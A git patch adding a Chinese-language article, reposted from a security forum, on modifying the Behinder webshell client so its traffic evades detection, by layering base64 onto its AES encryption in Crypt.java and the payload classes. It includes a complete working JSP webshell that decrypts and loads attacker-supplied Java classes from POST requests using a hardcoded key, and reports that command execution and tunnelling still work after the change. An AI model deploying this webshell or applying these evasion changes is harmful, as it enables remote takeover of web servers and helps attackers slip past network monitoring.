From ddc544e992fa25cedb6468a933a52c69d81bc661 Mon Sep 17 00:00:00 2001 From: tennc <670357+tennc@users.noreply.github.com> Date: Fri, 5 Aug 2022 23:15:17 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=AE=80=E5=8D=95=E7=9A=84=E5=86=B0?= =?UTF-8?q?=E8=9D=8E=E6=B5=81=E9=87=8F=E9=AD=94=E6=94=B9.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit from: https://xz.aliyun.com/t/11530 aythor: Credink --- Behinder/简单的冰蝎流量魔改.md | 64 +++++++++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 Behinder/简单的冰蝎流量魔改.md diff --git a/Behinder/简单的冰蝎流量魔改.md b/Behinder/简单的冰蝎流量魔改.md new file mode 100644 index 0000000..39eabc5 --- /dev/null +++ b/Behinder/简单的冰蝎流量魔改.md @@ -0,0 +1,64 @@ +感觉冰蝎流量魔改的文章比较少,我自己琢磨了一下,感觉简单地做个流量魔改并不复杂,发出来供大家参考。我自己是个Java笨比,有问题的地方欢迎大佬们评论区指正共同学习。 + +0x00 冰蝎源码 +--------- + +冰蝎源码的获取,可以下载冰蝎,用idea自带的反编译工具去反编译,我这里直接用github搜到的别人整理好的反编译代码了([https://github.com/x1a0t/Behinder-Source)](https://github.com/x1a0t/Behinder-Source%EF%BC%89) + +0x01 Crypt.java的修改 +------------------ + +### (1)加密函数 + +在Crypt.java中,可以修改Encrypt、EncryptForPhp这类加密函数的逻辑,比如在返回结果数据前,对结果做自定义的加密处理。我这里的例子就是在原有的AES基础上做了个base64编码。 +note:`public static byte[] Encrypt(byte[] bs, String key, String scriptType, int encryptType)`这个函数不用改。 +我看了下,这个函数是在进最后的return前进了其他被改了逻辑的加密函数(比如EncryptForPhp),其他函数改过了,这里就不用动了。我最开始没仔细看代码的时候想着,人家写了个汇总函数在这里改应该挺快捷的,结果发现这里虽然写了个汇总的函数,但是有些时候调用加密还是调用了具体的加密函数(比如:EncryptForPhp),所以这里就不用管这个函数了。 +修改的例子: +[![](https://xzfile.aliyuncs.com/media/upload/picture/20220710203841-3a665d52-004d-1.png) +](https://xzfile.aliyuncs.com/media/upload/picture/20220710203841-3a665d52-004d-1.png) +[![](https://xzfile.aliyuncs.com/media/upload/picture/20220710203848-3f1843d8-004d-1.png) +](https://xzfile.aliyuncs.com/media/upload/picture/20220710203848-3f1843d8-004d-1.png) + +### (2)解密函数 + +修改Crypt.java里的Decrypt函数(我这里是做的base64编解码,只要在这个总的Decrypt函数开头做一次解码就行了,各位大佬们可以根据自己选用的编解码方式,自行修改这些Decrypt函数): +[![](https://xzfile.aliyuncs.com/media/upload/picture/20220710204208-b60f5558-004d-1.png) +](https://xzfile.aliyuncs.com/media/upload/picture/20220710204208-b60f5558-004d-1.png) + +0x02 payload的修改 +--------------- + +我自己对jsp马做了个简单的跟踪调试,发现解密函数解密的流量,应该是被客户端塞进去的payload里的xxx.class发出来的,这些流量发出来之前会调用payload里xxx.class的Encrypt()函数做个流量加密。所以这里的思路是,把payload里存在Encrypt()函数的xxx.class的Encrypt()函数加密逻辑都修改一下,就能贯通整个加解密通讯流程了。 +具体操作还是以jsp增加base64编码举例子: +因为演示的是jsp的部分,就去修改net.rebeyond.behinder.payload.java下面的Java代码文件,找到里面的Encrypt()函数(payload里的Java代码,挨个找找改一下,并不是每一个文件都有Encrypt,这里没有就不管),去修改加密逻辑就行了 +[![](https://xzfile.aliyuncs.com/media/upload/picture/20220710204655-612c50b2-004e-1.png) +](https://xzfile.aliyuncs.com/media/upload/picture/20220710204655-612c50b2-004e-1.png) +note:`别的语言的payload里的加密函数也叫encrypt(最多有些大小写区别),但是要修改的话需要用对应的语言去修改(其中,C#的是dll文件,需要额外的姿势,欢迎评论区老哥补充这方面方便的思路)` +以php为例子,加密函数修改如下: +[![](https://xzfile.aliyuncs.com/media/upload/picture/20220710205003-d10f6fae-004e-1.png) +](https://xzfile.aliyuncs.com/media/upload/picture/20220710205003-d10f6fae-004e-1.png) + +0x03 webshell马子的修改 +------------------ + +以jsp为例,这里就是在原本的base64解码里又套了一层base64解码: + +``` +<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(new String(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))))).newInstance().equals(pageContext);}%> +``` + +0x04 打包与测试 +---------- + +用maven做package打包,完成后要用的是名字长的那个jar包(Behinder-3.0-beta-11\_t00ls-jar-with-dependencies.jar) +[![](https://xzfile.aliyuncs.com/media/upload/picture/20220710205545-9d414f66-004f-1.png) +](https://xzfile.aliyuncs.com/media/upload/picture/20220710205545-9d414f66-004f-1.png) +本地运行,测试(命令执行、内网穿透等功能正常,不过数据库连接功能拉闸了): +[![](https://xzfile.aliyuncs.com/media/upload/picture/20220710205614-ae3af2cc-004f-1.png) +](https://xzfile.aliyuncs.com/media/upload/picture/20220710205614-ae3af2cc-004f-1.png) +[![](https://xzfile.aliyuncs.com/media/upload/picture/20220710205624-b47b1856-004f-1.png) +](https://xzfile.aliyuncs.com/media/upload/picture/20220710205624-b47b1856-004f-1.png) + +有两个还没解决的东西: +1.C#部分的dll文件处理(欢迎老哥们在评论区发点儿快捷的处理方法、思路) +2.数据库连接功能出现了bug(暂时还没去调试,老哥们有知道的欢迎评论区重拳出击)